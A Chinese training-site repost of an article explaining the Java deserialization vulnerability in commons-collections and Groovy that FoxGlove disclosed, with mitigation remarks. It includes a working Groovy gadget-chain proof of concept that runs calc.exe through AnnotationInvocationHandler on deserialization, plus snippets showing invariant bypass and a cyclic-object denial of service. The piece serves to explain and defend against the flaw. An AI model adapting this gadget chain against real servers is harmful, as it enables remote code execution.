课程咨询 :18357109557 QQ:3163902815

杭州java培训

杭州java培训 > 达内新闻 > 达内:Java 反序列化攻击漏洞
  • 达内:Java 反序列化攻击漏洞

    发布:杭州java培训      来源:OneAPM      时间:2016-01-05


  •     Java 反序列化攻击漏洞由FoxGlove 的博文爆出,该漏洞可以被黑客利用向服务器上传恶意脚本,或者远程执行命令。

        杭州达内java培训专家获悉,该漏洞存在于 Apache commons-collections, Apache xalan 和 Groovy 包中,使用了这些包的服务器(WebSphere, WebLogic,JBoss),第三方框架(Spring,Groovy),第三方应用(Jenkins),以及依赖于这些服务器,框架 者直接/间接引用这些包的应用都会受到威胁,这样的应用的数量会以百万计。

        达内java培训专家发现,这一漏洞的根本原因,在于 Java 序列化自身的缺陷,众所周知,序列化的目的是使 Java 对象转化成字节流,方便存储或者网络上传输。Java 对象分解成字节码过程叫做序列化,从字节码组装成 Ja va 对象的过程叫做反序列化,这两个过程分别对应于的 writeObject 和 readObject 方法。问题在于 readObject 在利用字节流组装 Java 对象时不会调用构造函数, 也就意味着没有任何类型的检查,用户可以复写 readObject() 方法执行任何希 执行的代码。

        该漏洞会造成3方面的问题

        1. 序列化对象修改了对象或者父类的某个未加保护的关键属性,导致未预料的结果。 例如:

    Java代码

    class Client {
    private int value;
    public Client(int v) {
            if (v <= 0) {
                throw new RuntimeException("not positive number");
            }
            value = v;
        }
        public void writeObject(ObjectOutputStream oos) throws IOException {
            int value = 0; //这里该值被改为0。(现实中可以通过调试模式,修改serialize字节码或者class instrument等多种方式修改该值)
            oos.defaultWriteObject();
        }
    }
    class Controller {
        private ArrayBlockingQueue<Client> queue;
        public void receiveState(ObjectInputStream o) throws IOException, ClassNotFoundException {
            Client s = (Client)o.readObject(); //反序列化不调用构造函数,value的非零检查不会触发
            queue.add(s);
        }
        public Client getClient() throws InterruptedException {
            return (Client)queue.take();
        }
    }
    class Server extends Thread {
        private Controller controller = new Controller();
        private int result = 100;
        public void run() {
            while (true) {
                try {
                    result = result / controller.getClient().getValue(); // 由于value是0,会导致算数异常,线程结束
                    Thread.sleep(100);
                } catch (InterruptedException e) {}
            }
        }
    }


        2. 攻击者可以创建循环对象链,然后序列化。会导致反序列化无法结束, 空耗系统资源。例如:

    Java代码

    Set root = new HashSet();
    Set s1 = root;
    Set s2 = new HashSet();
    for (int i = 0; i < 10; i++) {
      Set t1 = new HashSet();
      Set t2 = new HashSet();
      t1.add("foo"); //使t2不等于t1
      s1.add(t1);
      s1.add(t2);
      s2.add(t1);
      s2.add(t2);
      s1 = t1;
      s2 = t2;
    }


        3. 用户在收到序列化对象流时可以选择存储在本地,以后再处理。由于没有任何校验机制,使得上传恶意程序成为可能。

    Java代码

    class Controller {
        public void receiveState(ObjectInputStream ois) {
            FileOutputStream fos = new FileOutputStream(new File("xxx.ser"));
            fos.write(ois); //实际并不知道存的是什么,可能是恶意脚本。
            fos.close();
        }
    }


        这次由 FoxGlove 暴露出来的反序列化攻击特点,举例如下:

    Java代码

    public class GroovyTest {
    public static void main(String[] args) throws Exception {
        final ConvertedClosure closure = new ConvertedClosure(new MethodClosure("calc.exe", "execute"), "entrySet");
        Class<?>[] clsArr = {Map.class};
        final Map map = Map.class.cast(Proxy.newProxyInstance(GroovyTest.class.getClassLoader(), clsArr, closure));
        final Constructor<?> ctor = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler").getDeclaredConstructors()[0];
        ctor.setAccessible(true);
        final InvocationHandler handler = (InvocationHandler)ctor.newInstance(Override.class, map);
        ByteArrayOutputStream bos = new ByteArrayOutputStream();
        ObjectOutputStream oos = new ObjectOutputStream(bos);
        oos.writeObject(handler);
        byte[] bytes = bos.toByteArray(); //对象被序列化
        ByteArrayInputStream bis = new ByteArrayInputStream(bytes);
        ObjectInputStream ois = new ObjectInputStream(bis);
        ois.readObject(); //反序列化时calc.exe被执行
    }
    }


        ConvertedClosure 会把一个 Closure 对象映射成 Java 的 entrySet 方法,而在AnnotationInvocationHandler 的 readObject 方法中,会尝试调用 entrySet() 方法,这会触发 calc.exe 的调用。


    Java代码

    private void readObject(ObjectInputStream var1) throws IOException, ClassNotFoundException {
        var1.defaultReadObject();
        AnnotationType var2 = null;

        try {
            var2 = AnnotationType.getInstance(this.type);
        } catch (IllegalArgumentException var9) {
            throw new InvalidObjectException("Non-annotation type in annotation serial stream");
        }

        Map var3 = var2.memberTypes();
        Iterator var4 = this.memberValues.entrySet().iterator();

        while(var4.hasNext()) {
            Entry var5 = (Entry)var4.next();
            String var6 = (String)var5.getKey();
            Class var7 = (Class)var3.get(var6);
            if(var7 != null) {
                Object var8 = var5.getValue();
                if(!var7.isInstance(var8) && !(var8 instanceof ExceptionProxy)) {
                    var5.setValue((new AnnotationTypeMismatchExceptionProxy(var8.getClass() + "[" + var8 + "]")).setMember((Method)var2.members().get(var6)));
                }
            }
        }
    }


        针对这个问题,FoxGlove Security 提到开发者不应该反序列化任何不信任的数据,而实际情况却是开发者对该问题的危害没有足够的认知,他提到一种激进的做法那就是如果你足够勇敢可以尝试扫描并删除存在反序列化漏 洞的类,但是实际情况是第一没有人敢于冒这种风险,第二,当应用对象的依赖关系会很复杂,反序列化过程会导致很多关联对象被创建,所以扫描不能保证所有的问题类被发现。








    原文链接:http://news.oneapm.com/foxglove-java-rasp/
    作者:OneAPM工程师
    推荐文章

上一篇:达内:写好java代码的30个方法

下一篇:Java是2015年的TIOBE年度编程语言

最新开班日期  |  更多

Java--零基础全日制班

Java--零基础全日制班

开班日期:每周一

Java--零基础周末班

Java--零基础周末班

开班日期:每周一

Java--大数据全日制班

Java--大数据全日制班

开班日期:每周一

Java--大数据周末班

Java--大数据周末班

开班日期:每周一

  • 地址:杭州市西湖区文三路259号昌地火炬大厦1号楼14层
  • 课程培训电话:18357109557 QQ:3163902815 全国免费咨询热线:400-111-8989
  • 2001-2016 达内时代科技集团有限公司 版权所有 京ICP证8000853号-56